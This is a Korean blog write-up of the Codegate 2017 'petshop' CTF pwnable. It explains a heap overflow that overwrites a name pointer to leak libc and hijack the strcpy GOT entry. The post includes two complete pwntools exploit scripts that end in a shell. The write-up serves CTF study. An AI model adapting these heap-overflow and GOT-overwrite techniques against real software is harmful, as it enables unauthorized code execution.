Notice
Recent Posts
Recent Comments
Link
«   2025/05   »
1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 31
Tags
more
Archives
Today
Total
관리 메뉴

cdor1's lab

Codegate 2017 petshop 본문

Security/Pwnable

Codegate 2017 petshop

Cdor1 2017. 4. 20. 04:10

heap overflow를 그냥 준다...

대회 당일에 ubuntu 14.04는 파일 실행이 안되길래 16.04 찾아 깔려다가 귀찮아서 코드 분석만 했는데 

c++이라 잘 보이지도 않고 의욕 떨어져서 끈기있게 잡지도 않았다.

aws를 16.04로 갈아엎고 실행해서 풀었는데 손퍼징의 중요성을 알았다 ㅎ..

여기서 인풋값을 제한하지 않는다.

뒷쪽 user_name의 포인터가 존재하는데 이 부분을 덮어서 leak할 수 있다.

또한 user_name ptr에 입력받는 부분이 있으므로 포인터를 got로 덮어놓고 인풋을 넣어서 exploit할 수 있다.


from pwn import *
#s = process('./petshop')
s = remote('localhost', 4000)
def buy(select):
	print s.recvuntil('select:\n')
	s.sendline('1')
	print s.recvuntil('select:\n')
	s.sendline(str(select))

def sell():
	print s.recvuntil('select:\n')
	s.sendline('2')

def sound(select):
	print s.recvuntil('select:\n')
	s.sendline('3')
	print s.recvuntil('select for sound:\n')
	s.sendline(str(select))

def set_pet(select, name, sound, feed):
	print s.recvuntil('select:\n')
	s.sendline('4')
	print s.recvuntil('select for set:\n')
	s.sendline(str(select))
	print s.recvuntil('name:\n')
	s.sendline(name)
	print s.recvuntil('sound:\n')
	s.sendline(sound)
	print s.recvuntil('feed:\n')
	s.sendline(feed)

def list_all():
	print s.recvuntil('select:\n')
	s.sendline('5')

def set_name(name):
	print s.recvuntil('select:\n')
	s.sendline('6')
	print s.recvuntil('your name?\n')
	s.sendline(name)


buy(1)
buy(1)
payload = 'A' * 0x20
payload += p64(0x604088) #strcpy
payload += p64(0x10) * 2
set_pet(1, payload, 'A'*8, 'B'*8)
list_all()
print s.recvuntil('person:')
leak = u64(s.recv(6).ljust(8, '\x00'))
base = leak - 675360
system = base + 0x45390
oneshot = base + 0x45216
log.info('leak : ' + hex(leak))
log.info('base : ' + hex(base))
log.info('system : ' + hex(system))
log.info('oneshot : ' + hex(oneshot))

set_name(p64(oneshot)[:-1])
s.sendline('1')
s.sendline('1')
s.interactive()



from pwn import *
s = process('./petshop')
#s = remote('localhost', 4000)
def buy(select):
	print s.recvuntil('select:\n')
	s.sendline('1')
	print s.recvuntil('select:\n')
	s.sendline(str(select))

def sell():
	print s.recvuntil('select:\n')
	s.sendline('2')

def sound(select):
	print s.recvuntil('select:\n')
	s.sendline('3')
	print s.recvuntil('select for sound:\n')
	s.sendline(str(select))

def set_pet(select, name, sound, feed):
	print s.recvuntil('select:\n')
	s.sendline('4')
	print s.recvuntil('select for set:\n')
	s.sendline(str(select))
	print s.recvuntil('name:\n')
	s.sendline(name)
	print s.recvuntil('sound:\n')
	s.sendline(sound)
	print s.recvuntil('feed:\n')
	s.sendline(feed)

def list_all():
	print s.recvuntil('select:\n')
	s.sendline('5')

def set_name(name):
	print s.recvuntil('select:\n')
	s.sendline('6')
	print s.recvuntil('your name?\n')
	s.sendline(name)


buy(1)
buy(2)
payload = 'A' * 0x20
payload += p64(0x604088) #strcpy
payload += p64(0x8) * 2
set_pet(1, payload, 'A'*4, 'B'*4)
list_all()
print s.recvuntil('person:')
leak = u64(s.recv(6).ljust(8, '\x00'))
base = leak - 675360
system = base + 0x45390
oneshot = base + 0x45216
log.info('leak : ' + hex(leak))
log.info('base : ' + hex(base))
log.info('system : ' + hex(system))
log.info('oneshot : ' + hex(oneshot))

payload = 'A' * 0x20
payload += p64(0x604088) #strcpy
payload += p64(0x11) * 2
payload += p64(0x604088) * 13 + '/bin/sh\x00'
set_pet(1, payload, 'A'*4, 'B'*4)
set_name(p64(system)[:-1])
s.sendline('1')
s.sendline('1')
s.interactive()


'Security > Pwnable' 카테고리의 다른 글

NOE systems pwnable card.c  (0) 2017.05.11
TAMUCTF All Pwnable  (0) 2017.04.20
MIPS GADGET  (0) 2017.04.19
0ctf babyheap  (0) 2017.04.18
QEMU MIPS  (0) 2017.04.10
공유하기 링크
'Security/Pwnable' Related Articles more
Comments